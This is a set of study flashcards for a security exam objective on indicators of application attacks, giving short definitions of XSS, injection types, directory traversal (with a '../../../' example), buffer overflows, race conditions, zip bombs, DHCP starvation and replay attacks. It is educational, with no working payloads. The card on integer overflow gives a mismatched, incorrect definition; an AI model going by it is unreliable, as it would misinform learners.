Obj 1.3 - Indicators of Application Attacks Flashcards

1
Q

Privilege Escalation

A

gaining higher-level access to a system to exploit it

can be horizontal - another user of same level

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Cross-site scripting

A

usually uses JS to inject code via a non-validated input on a web page

Two types:

  • persistent (stored)
  • non-persistent (reflected)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Non-persistent (reflected)

A

an XSS attack requiring user to click a specific link

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

persistent (stored)

A

an XSS attack stored permanently on a server
all page visitors will be running malware script
spreads quickly through “sharing pages” on social media

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

injection types

A

SQL
DLL
LDAP
XML

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

SQL injection

A

Structured Query Language

most common injection type
exploits site inputs without input validation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

DLL injection

A

Dynamic Link Library

hijacking an application to run a malicious DLL
often takes advantage of escalated privileges that host application has.
used to evade process-based defenses

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

LDAP injection

A

Lightweight Directory Access Protocol

similar to SQL injection
exploits web apps that construct LDAP statements based on user input
executes arbitrary commands, grants permissions to unauth. queries, modifies content in the LDAP tree.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

null pointer reference || pointer/object dereference attack

A

Nullifying a value

can cause application crash, debug info display, DoS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

directory traversal

A

reading files outside of a website’s file directory

e.g. users shouldn’t be able to browse the windows folder

../../../

either web server or web application vulnerability

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

SSL Stripping

A

HTTP downgrade + on-path attack

on-path attacker removes the “s” from https
ssl = secure sockets layer

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

buffer overflows

A

writing data that overwrites adjacent memory locations.
enables malicious code to be written in areas for executable code, or to overwrite data, or gain privilege escalation.
can corrupt data, crash the program, or cause the execution of malicious code.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

race condition

A

when two things try to happen at the same time

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

TOCTOU (time of check, time of use) attack

A

a race condition exploit

taking advantage of any gap in time between a “check” of valid data and the “use” of that data.

can cause:
reboot loops (mars rover)
communication failures (blackout of 2003)
or death (therac-25 radiation therapy in 80s)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

memory leak

A
unused memory not released
grows
uses all memory
system crashes
e.g. DoS
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

integer overflow

A

an input where anything goes

always do a validation check
look for malicious input like sql injections
can cause: buffer overflows, DoS, etc.

17
Q

API attacks

A

API = relatively new communication path

can cause:

  • exposing sensitive data
  • DoS
  • intercepted comms
  • privileged access
18
Q

Resource exhaustion

A

a specialized DoS attack that uses up all the available resource of a device so that apps can’t run.

can be accomplished by a single device over low bandwidth.

19
Q

ZIP bomb

A

a resource exhaustion attack

sending a zip file that unzips to an unfathomable size

42kb .zip –> 4.5 petabytes (4500 terabytes) :
antivirus will usually id these

20
Q

DHCP starvation

A

a network-based resource exhaustion attack
floods network with “new devices” requesting IP addresses (really it’s just a new MAC address each time)
DHCP server quickly uses up all available IP addresses preventing real new devices from connecting
mitigation: configure switch to limit DHCP requests.

btw, it’s Dynamic Host Configuration Protocol

21
Q

replay attack

A

intercepted data is retransmitted or delayed, sometimes as part of spoofing by IP packet substitution
a man-in-the-middle attack

22
Q

session replay attack

A

using an active session ID to pose as the victim and communicate directly to a service without username or password.
mitigate: mask session IDs with SSL or TLS encryption.